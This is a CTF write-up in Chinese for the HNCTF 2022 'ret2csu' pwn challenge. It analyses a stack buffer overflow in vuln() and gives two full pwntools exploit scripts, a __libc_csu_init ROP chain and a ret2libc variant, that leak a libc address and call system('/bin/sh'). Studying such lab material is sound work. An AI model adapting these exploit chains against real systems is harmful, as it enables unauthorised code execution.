HNCTF 2022 week2-ret2csu Writeup

检查文件保护

检查文件保护

开了NX保护

分析

main函数

/* Decompiled entry point of the challenge binary (IDA output, kept as-is).
 * It only disables stdio buffering, prints a banner and hands control to
 * vuln(); every byte of untrusted input is handled inside vuln(). */
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  setbuf(_bss_start, 0LL);   /* presumably stdout; the decompiler resolved the symbol to _bss_start -- confirm */
  write(1, "Start Your Exploit!\n", 0x14uLL);
  vuln();
  return 0;
}

有一个vuln函数

vuln函数

/* Decompiled vulnerable function (IDA output, kept as-is).
 * The read length (0x200) is not bounded by sizeof(buf) (256), so up to 256
 * excess bytes overwrite the saved rbp and the return address: a classic
 * stack-based buffer overflow. The fix is to bound the read by the buffer,
 * e.g. read(0, buf, sizeof(buf)), and to build with stack protector / PIE. */
ssize_t vuln()
{
  char buf[256]; // [rsp+0h] [rbp-100h] BYREF

  write(1, "Input:\n", 7uLL);
  read(0, buf, 0x200uLL);   /* 0x200 > sizeof(buf): overflow */
  return write(1, "Ok.\n", 4uLL);
}

读取输入最多512(0x200)个字节到buf,但buf大小只有256字节,所以存在栈缓冲区溢出.

利用姿势

根据题目介绍,这题是ret2csu,所以着重看__libc_csu_init函数的汇编;有了可用的寄存器后,再正常打ret2libc。(下图: __libc_csu_init函数的汇编重点段)

下图中存在两个csu:

两个csu

这里我们使用下面那个csu

接下来计算偏移量: buf大小为256(0x100)字节,再加上保存的rbp 8字节,所以到返回地址的偏移量为264(0x108)

ROPgadget找一下我们能用的gadget:

EXP

#-*- coding:utf-8 -*-
# Two-stage solve script for the ret2csu challenge.
# Stage 1: overflow vuln()'s 256-byte buffer and use the __libc_csu_init
#          gadgets to call write(1, write@got, 8), leaking the resolved
#          address of write, then return into vuln() for a second input.
# Stage 2: classic ret2libc -- derive libc_base from the leak and call system().
# Every hard-coded address (0x4012xx gadgets, 0x404018) is specific to this
# challenge binary and its libc; the comments say where they were taken from.

from pwn import *
# import duchao_pwn_script
context(log_level='debug',arch='amd64', os='linux')
pwnfile= './ret2csu'
# io = process(pwnfile)
# NOTE(review): `port` is never assigned in this listing, so this line raises
# NameError as written; 'host'/port are placeholders for the challenge service.
io = remote('host',port)
elf = ELF(pwnfile)
rop = ROP(pwnfile)   # not used below
libc_file_path = './libc.so.6' 
libc = ELF(libc_file_path)

# 256-byte buf + 8-byte saved rbp = 0x108 bytes up to the return address.
padding = 0x108
leak_func_name ='write'  
leak_func_got = elf.got[leak_func_name]

return_addr = elf.symbols['vuln']   # re-enter vuln() after the leak
# write_sym = 0x404018
# presumably the same value as leak_func_got (write@got) -- confirm with elf.got
write_sym = 0x404018
# 404018

pop_rdi_ret = 0x4012b3
pop_rsi_r15_ret = 0x4012b1
# gdb.attach(io)
# pause()

# First csu gadget: pops rbx, rbp, r12, r13, r14, r15 from the stack.
pop_rbx_addr = 0x4012AA #found in IDA
rbx=0
rbp=1
r12=1 #arg1 rdi
r13=leak_func_got #arg2 rsi
r14=8 #arg3 rdx 
r15 = write_sym #call func
# Second csu gadget: moves r12/r13/r14 into the argument registers and calls
# through the pointer held in r15 (see the register comments above).
# rbx=0 / rbp=1 are presumably what its loop check expects -- confirm in IDA.
mov_rdx_r14_addr = 0x401290 #found in IDA

payload  = b'a'* padding 
payload += flat([pop_rbx_addr , rbx , rbp , r12 , r13 , r14 , r15 , mov_rdx_r14_addr])
# presumably the 7 filler qwords are consumed by the csu epilogue
# (add rsp,8 + six pops) before it returns into vuln() -- confirm in IDA
payload +=  p64(0xdeadbeef)*7 + p64(return_addr)

delimiter = 'Input:\n'
io.sendlineafter(delimiter, payload)

# pause()
# u64 => 0x0b 0x12 0x40 0x00 0x00 0x00 0x00 0x00
# u32 => 0x0b 0x12 0x40 0x00
# u16 => 0x0b 0x12
# u8  => 0x0b
# struct.unpack

io.recvuntil(b'Ok.\n')
# write() emits 8 bytes of the GOT entry; the upper two bytes of a user-space
# pointer are zero, so 6 are read and zero-padded back to 8 for u64().
write_addr = u64(io.recv(6).ljust(8,b'\x00'))
# wirte_addr = u64(io.recv(7).ljust(8,b'\x00'))
# NOTE(review): "wirte" is a typo in the log label; it is runtime output, left as-is.
success('wirte_addr:'+hex(write_addr))
libc_base = write_addr - libc.sym['write']
# libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['write']
print('libc_base',hex(libc_base))
system_addr = libc_base + libc.sym['system']
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))

success('libc_base:'+hex(libc_base))


# system_addr, bin_sh_addr = duchao_pwn_script.libcsearch_sys_sh(leak_func_name, write_addr)
# print(hex(system_addr))
# print(hex(bin_sh_addr))

'''
wirte_offset = 0xEEF20
libc_addr = write_addr - wirte_offset
print('libc_addr:',hex(libc_addr))

system_offset = 0x48E50
system_addr = libc_addr + system_offset
print('system_addr:',hex(system_addr))

bin_sh_offset = 0x18A156-4
bin_sh_addr = libc_addr + bin_sh_offset
print('bin_sh_addr:',hex(bin_sh_addr))

gdb.attach(io)
pause()

'''
# presumably a lone `ret` gadget, placed so the stack is 16-byte aligned when
# system() is entered -- confirm at 0x40101a in IDA
ret = 0x40101a
# io.recvuntil('Ok.\n')
payload2 = b'a'* padding + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
# delimiter = 'Input:\n'
io.sendline(payload2)
# pause()
io.interactive()

ret2libc式打法

# Same target, plain ret2libc variant without the csu gadgets: write@got is
# leaked through write@plt in two 4-byte rounds, libc_base is derived from it,
# and a third round calls system(). Addresses are specific to this binary/libc.
from pwn import *

# NOTE(review): `port` is never assigned here (NameError as written); "host"/port are placeholders.
io = remote("host", port)
# io = process('ret2csu')
elf = ELF('ret2csu')
libc = ELF('libc.so.6')
context(log_level='debug')
pop_rdi = 0x4012b3
ret = 0x40101a       # presumably a lone `ret` used for stack alignment before system() -- confirm
rsi_r15 = 0x4012b1   # pop rsi ; pop r15 ; ret  (the p64(0) below is the r15 filler)

# leak high 4 bytes and low 4 bytes of write
# 0x100 + 0x08 = buf size + saved rbp. rdx is not set by this chain, so the
# leak apparently relies on its leftover value (hence two 4-byte reads) --
# confirm with a debugger.
io.sendlineafter(b'Input:', b'A' * (0x100 + 0x08) + p64(pop_rdi) + p64(1) + p64(rsi_r15) + p64(elf.got['write']) + p64(0) + p64(elf.plt['write']) + p64(elf.sym['vuln']))
io.recvuntil(b'Ok.\n')
got_write_0 = u32(io.recvuntil(b'Input', drop=True).ljust(4, b'\x00'))
print("got_write_0: ", hex(got_write_0))
# second round reads the upper half of the same GOT entry (got['write'] + 4)
io.sendline(b'A' * (0x100 + 0x08) + p64(pop_rdi) + p64(1) + p64(rsi_r15) + p64(elf.got['write'] + 4) + p64(0) + p64(elf.plt['write']) + p64(elf.sym['vuln']))
io.recvuntil(b'Ok.\n')
got_write_1 = u32(io.recvuntil(b'Input', drop=True).ljust(4, b'\x00'))
print("got_write_1: ", hex(got_write_1))
got_write = got_write_0 | (got_write_1 << 32)   # reassemble the 8-byte pointer
print("got_write: ", hex(got_write))

libc_base = got_write - libc.sym['write']
print("libc_base: ", hex(libc_base))

# 0x1D8698 is presumably the offset of the "/bin/sh" string in this libc
# (the first script derives it with libc.search) -- confirm for the given libc.so.6
io.sendline(b'A' * (0x100 + 0x08) + p64(ret) + p64(pop_rdi) + p64(libc_base + 0x1D8698) + p64(libc_base + libc.sym["system"]) + p64(elf.sym['vuln']))
io.interactive()

HNCTF 2022 week2-ret2csu Writeup
https://zer0ptr.github.io/2025/11/14/HNCTF2022-week2-ret2csu/
作者
zer0ptr
发布于
2025年11月14日